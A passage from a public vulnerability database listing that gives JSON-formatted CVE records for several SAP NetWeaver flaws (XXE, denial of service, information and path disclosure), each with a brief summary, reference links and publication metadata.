"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75452"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2012-2612",
"datePublished": "2012-05-15T01:00:00",
"dateReserved": "2012-05-10T00:00:00",
"dateUpdated": "2024-08-06T19:42:30.628Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2013-6244
Vulnerability from cvelistv5
Published
2013-10-24 00:00
Modified
2024-09-17 00:46
Severity ?
EPSS score ?
Summary
The Live Update webdynpro application (webdynpro/dispatcher/sap.com/tc~slm~ui_lup/LUP) in SAP NetWeaver 7.31 and earlier allows remote attackers to read arbitrary files and directories via an XML document containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.
References
| ▼ | URL | Tags |
|---|---|---|
| http://secunia.com/advisories/55302 | third-party-advisory, x_refsource_SECUNIA | |
| http://en.securitylab.ru/lab/PT-2013-13 | x_refsource_MISC | |
| https://service.sap.com/sap/support/notes/1820894 | x_refsource_MISC | |
| http://osvdb.org/98892 | vdb-entry, x_refsource_OSVDB | |
| http://scn.sap.com/docs/DOC-8218 | x_refsource_CONFIRM | |
| http://www.securityfocus.com/bid/63302 | vdb-entry, x_refsource_BID |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T17:38:59.496Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "55302",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/55302"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://en.securitylab.ru/lab/PT-2013-13"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://service.sap.com/sap/support/notes/1820894"
},
{
"name": "98892",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/98892"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "63302",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/63302"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "The Live Update webdynpro application (webdynpro/dispatcher/sap.com/tc~slm~ui_lup/LUP) in SAP NetWeaver 7.31 and earlier allows remote attackers to read arbitrary files and directories via an XML document containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2013-10-24T00:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "55302",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/55302"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://en.securitylab.ru/lab/PT-2013-13"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://service.sap.com/sap/support/notes/1820894"
},
{
"name": "98892",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/98892"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "63302",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/63302"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-6244",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The Live Update webdynpro application (webdynpro/dispatcher/sap.com/tc~slm~ui_lup/LUP) in SAP NetWeaver 7.31 and earlier allows remote attackers to read arbitrary files and directories via an XML document containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "55302",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/55302"
},
{
"name": "http://en.securitylab.ru/lab/PT-2013-13",
"refsource": "MISC",
"url": "http://en.securitylab.ru/lab/PT-2013-13"
},
{
"name": "https://service.sap.com/sap/support/notes/1820894",
"refsource": "MISC",
"url": "https://service.sap.com/sap/support/notes/1820894"
},
{
"name": "98892",
"refsource": "OSVDB",
"url": "http://osvdb.org/98892"
},
{
"name": "http://scn.sap.com/docs/DOC-8218",
"refsource": "CONFIRM",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "63302",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/63302"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-6244",
"datePublished": "2013-10-24T00:00:00Z",
"dateReserved": "2013-10-23T00:00:00Z",
"dateUpdated": "2024-09-17T00:46:59.269Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2017-9845
Vulnerability from cvelistv5
Published
2017-07-12 16:00
Modified
2024-08-05 17:18
Severity ?
EPSS score ?
Summary
disp+work 7400.12.21.30308 in SAP NetWeaver 7.40 allows remote attackers to cause a denial of service (resource consumption) via a crafted DIAG request, aka SAP Security Note 2405918.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securityfocus.com/bid/96874 | vdb-entry, x_refsource_BID | |
| https://erpscan.io/advisories/erpscan-17-015-sap-netweaver-dispwork-anonymous-denial-service/ | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T17:18:02.196Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "96874",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/96874"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/erpscan-17-015-sap-netweaver-dispwork-anonymous-denial-service/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2017-03-14T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "disp+work 7400.12.21.30308 in SAP NetWeaver 7.40 allows remote attackers to cause a denial of service (resource consumption) via a crafted DIAG request, aka SAP Security Note 2405918."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-12-10T17:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "96874",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/96874"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/erpscan-17-015-sap-netweaver-dispwork-anonymous-denial-service/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-9845",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "disp+work 7400.12.21.30308 in SAP NetWeaver 7.40 allows remote attackers to cause a denial of service (resource consumption) via a crafted DIAG request, aka SAP Security Note 2405918."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "96874",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/96874"
},
{
"name": "https://erpscan.io/advisories/erpscan-17-015-sap-netweaver-dispwork-anonymous-denial-service/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/erpscan-17-015-sap-netweaver-dispwork-anonymous-denial-service/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-9845",
"datePublished": "2017-07-12T16:00:00",
"dateReserved": "2017-06-24T00:00:00",
"dateUpdated": "2024-08-05T17:18:02.196Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2013-3319
Vulnerability from cvelistv5
Published
2013-08-16 17:00
Modified
2024-08-06 16:07
Severity ?
EPSS score ?
Summary
The GetComputerSystem method in the HostControl service in SAP Netweaver 7.03 allows remote attackers to obtain sensitive information via a crafted SOAP request to TCP port 1128.
References
| ▼ | URL | Tags |
|---|---|---|
| https://service.sap.com/sap/support/notes/1816536 | x_refsource_CONFIRM | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/85905 | vdb-entry, x_refsource_XF | |
| http://scn.sap.com/docs/DOC-8218 | x_refsource_CONFIRM | |
| http://labs.integrity.pt/advisories/cve-2013-3319/ | x_refsource_MISC | |
| http://secunia.com/advisories/54277 | third-party-advisory, x_refsource_SECUNIA |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T16:07:37.854Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://service.sap.com/sap/support/notes/1816536"
},
{
"name": "sap-netweaver-cve20133319-info-disc(85905)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/85905"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://labs.integrity.pt/advisories/cve-2013-3319/"
},
{
"name": "54277",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/54277"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2013-07-09T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The GetComputerSystem method in the HostControl service in SAP Netweaver 7.03 allows remote attackers to obtain sensitive information via a crafted SOAP request to TCP port 1128."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-08-28T12:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://service.sap.com/sap/support/notes/1816536"
},
{
"name": "sap-netweaver-cve20133319-info-disc(85905)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/85905"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://labs.integrity.pt/advisories/cve-2013-3319/"
},
{
"name": "54277",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/54277"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-3319",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The GetComputerSystem method in the HostControl service in SAP Netweaver 7.03 allows remote attackers to obtain sensitive information via a crafted SOAP request to TCP port 1128."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://service.sap.com/sap/support/notes/1816536",
"refsource": "CONFIRM",
"url": "https://service.sap.com/sap/support/notes/1816536"
},
{
"name": "sap-netweaver-cve20133319-info-disc(85905)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/85905"
},
{
"name": "http://scn.sap.com/docs/DOC-8218",
"refsource": "CONFIRM",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "http://labs.integrity.pt/advisories/cve-2013-3319/",
"refsource": "MISC",
"url": "http://labs.integrity.pt/advisories/cve-2013-3319/"
},
{
"name": "54277",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/54277"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-3319",
"datePublished": "2013-08-16T17:00:00",
"dateReserved": "2013-05-02T00:00:00",
"dateUpdated": "2024-08-06T16:07:37.854Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2014-1961
Vulnerability from cvelistv5
Published
2014-02-14 15:00
Modified
2024-08-06 09:58
Severity ?
EPSS score ?
Summary
Unspecified vulnerability in the Portal WebDynPro in SAP NetWeaver allows remote attackers to obtain sensitive path information via unknown attack vectors.
References
| ▼ | URL | Tags |
|---|---|---|
| http://secunia.com/advisories/56947 | third-party-advisory, x_refsource_SECUNIA | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/91096 | vdb-entry, x_refsource_XF | |
| http://scn.sap.com/docs/DOC-8218 | x_refsource_CONFIRM | |
| https://service.sap.com/sap/support/notes/1852146 | x_refsource_CONFIRM | |
| https://erpscan.io/advisories/erpscan-14-002-sap-portal-webdynpro-path-disclosure/ | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T09:58:16.053Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "56947",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/56947"
},
{
"name": "netweaver-webdyn-path-disclosure(91096)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91096"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://service.sap.com/sap/support/notes/1852146"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/erpscan-14-002-sap-portal-webdynpro-path-disclosure/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2014-01-31T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Unspecified vulnerability in the Portal WebDynPro in SAP NetWeaver allows remote attackers to obtain sensitive path information via unknown attack vectors."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-12-10T17:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "56947",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/56947"
},
{
"name": "netweaver-webdyn-path-disclosure(91096)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91096"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://service.sap.com/sap/support/notes/1852146"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/erpscan-14-002-sap-portal-webdynpro-path-disclosure/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2014-1961",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Unspecified vulnerability in the Portal WebDynPro in SAP NetWeaver allows remote attackers to obtain sensitive path information via unknown attack vectors."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "56947",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/56947"
},
{
"name": "netweaver-webdyn-path-disclosure(91096)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91096"
},
{
"name": "http://scn.sap.com/docs/DOC-8218",
"refsource": "CONFIRM",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "https://service.sap.com/sap/support/notes/1852146",
"refsource": "CONFIRM",
"url": "https://service.sap.com/sap/support/notes/1852146"
},
{
"name": "https://erpscan.io/advisories/erpscan-14-002-sap-portal-webdynpro-path-disclosure/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/erpscan-14-002-sap-portal-webdynpro-path-disclosure/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2014-1961",
"datePublished": "2014-02-14T15:00:00",
"dateReserved": "2014-02-14T00:00:00",
"dateUpdated": "2024-08-06T09:58:16.053Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2014-8591
Vulnerability from cvelistv5
Published
2014-11-04 15:00
Modified
2024-08-06 13:26
Severity ?
EPSS score ?
Summary
Unspecified vulnerability in SAP Internet Communication Manager (ICM), as used in SAP NetWeaver 7.02 and 7.3, allows remote attackers to cause a denial of service (process termination) via unknown vectors.
References
| ▼ | URL | Tags |
|---|---|---|
| https://erpscan.io/press-center/blog/sap-critical-patch-update-october-2014/ | x_refsource_MISC | |
| https://service.sap.com/sap/support/notes/1966655 | x_refsource_CONFIRM | |
| https://erpscan.io/advisories/erpscan-14-016-sap-netweaver-httpd-partial-http-post-requests-dos/ | x_refsource_MISC | |
| http://blog.onapsis.com/analyzing-sap-security-notes-october-2014-edition/ | x_refsource_MISC | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/98582 | vdb-entry, x_refsource_XF | |
| https://twitter.com/SAP_Gsupport/status/524138333065449472 | x_refsource_CONFIRM | |
| http://www.securityfocus.com/bid/71030 | vdb-entry, x_refsource_BID |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T13:26:00.807Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/press-center/blog/sap-critical-patch-update-october-2014/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://service.sap.com/sap/support/notes/1966655"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/erpscan-14-016-sap-netweaver-httpd-partial-http-post-requests-dos/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://blog.onapsis.com/analyzing-sap-security-notes-october-2014-edition/"
},
{
"name": "sap-netweaver-cve20148591-dos(98582)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98582"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://twitter.com/SAP_Gsupport/status/524138333065449472"
},
{
"name": "71030",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/71030"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2014-10-24T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Unspecified vulnerability in SAP Internet Communication Manager (ICM), as used in SAP NetWeaver 7.02 and 7.3, allows remote attackers to cause a denial of service (process termination) via unknown vectors."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-12-10T17:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/press-center/blog/sap-critical-patch-update-october-2014/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://service.sap.com/sap/support/notes/1966655"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/erpscan-14-016-sap-netweaver-httpd-partial-http-post-requests-dos/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://blog.onapsis.com/analyzing-sap-security-notes-october-2014-edition/"
},
{
"name": "sap-netweaver-cve20148591-dos(98582)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98582"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://twitter.com/SAP_Gsupport/status/524138333065449472"
},
{
"name": "71030",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/71030"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2014-8591",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Unspecified vulnerability in SAP Internet Communication Manager (ICM), as used in SAP NetWeaver 7.02 and 7.3, allows remote attackers to cause a denial of service (process termination) via unknown vectors."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://erpscan.io/press-center/blog/sap-critical-patch-update-october-2014/",
"refsource": "MISC",
"url": "https://erpscan.io/press-center/blog/sap-critical-patch-update-october-2014/"
},
{
"name": "https://service.sap.com/sap/support/notes/1966655",
"refsource": "CONFIRM",
"url": "https://service.sap.com/sap/support/notes/1966655"
},
{
"name": "https://erpscan.io/advisories/erpscan-14-016-sap-netweaver-httpd-partial-http-post-requests-dos/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/erpscan-14-016-sap-netweaver-httpd-partial-http-post-requests-dos/"
},
{
"name": "http://blog.onapsis.com/analyzing-sap-security-notes-october-2014-edition/",
"refsource": "MISC",
"url": "http://blog.onapsis.com/analyzing-sap-security-notes-october-2014-edition/"
},
{
"name": "sap-netweaver-cve20148591-dos(98582)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98582"
},
{
"name": "https://twitter.com/SAP_Gsupport/status/524138333065449472",
"refsource": "CONFIRM",
"url": "https://twitter.com/SAP_Gsupport/status/524138333065449472"
},
{
"name": "71030",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/71030"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2014-8591",
"datePublished": "2014-11-04T15:00:00",
"dateReserved": "2014-11-04T00:00:00",
"dateUpdated": "2024-08-06T13:26:00.807Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2015-7241
Vulnerability from cvelistv5
Published
2017-09-06 21:00
Modified
2024-08-06 07:43
Severity ?
EPSS score ?
Summary
XML External Entity (XXE) vulnerability in SAP Netweaver before 7.01.
References
| ▼ | URL | Tags |
|---|---|---|
| http://packetstormsecurity.com/files/133627/SAP-Netweaver-XML-External-Entity-Injection.html | x_refsource_MISC | |
| http://www.securityfocus.com/archive/1/536504/100/0/threaded | mailing-list, x_refsource_BUGTRAQ | |
| https://www.exploit-db.com/exploits/38261/ | exploit, x_refsource_EXPLOIT-DB | |
| http://www.securityfocus.com/bid/76809 | vdb-entry, x_refsource_BID |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T07:43:45.906Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/133627/SAP-Netweaver-XML-External-Entity-Injection.html"
},
{
"name": "20150921 SAP Netwaver - XML External Entity Injection",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/536504/100/0/threaded"
},
{
"name": "38261",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/38261/"
},
{
"name": "76809",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/76809"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2014-10-29T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "XML External Entity (XXE) vulnerability in SAP Netweaver before 7.01."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-09T18:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/133627/SAP-Netweaver-XML-External-Entity-Injection.html"
},
{
"name": "20150921 SAP Netwaver - XML External Entity Injection",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/536504/100/0/threaded"
},
{
"name": "38261",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/38261/"
},
{
"name": "76809",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/76809"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2015-7241",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "XML External Entity (XXE) vulnerability in SAP Netweaver before 7.01."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://packetstormsecurity.com/files/133627/SAP-Netweaver-XML-External-Entity-Injection.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/133627/SAP-Netweaver-XML-External-Entity-Injection.html"
},
{
"name": "20150921 SAP Netwaver - XML External Entity Injection",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/536504/100/0/threaded"
},
{
"name": "38261",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/38261/"
},
{
"name": "76809",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/76809"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2015-7241",
"datePublished": "2017-09-06T21:00:00",
"dateReserved": "2015-09-18T00:00:00",
"dateUpdated": "2024-08-06T07:43:45.906Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2021-38163
Vulnerability from cvelistv5
Published
2021-09-14 11:21
Modified
2024-08-04 01:37
Severity ?
EPSS score ?
Summary
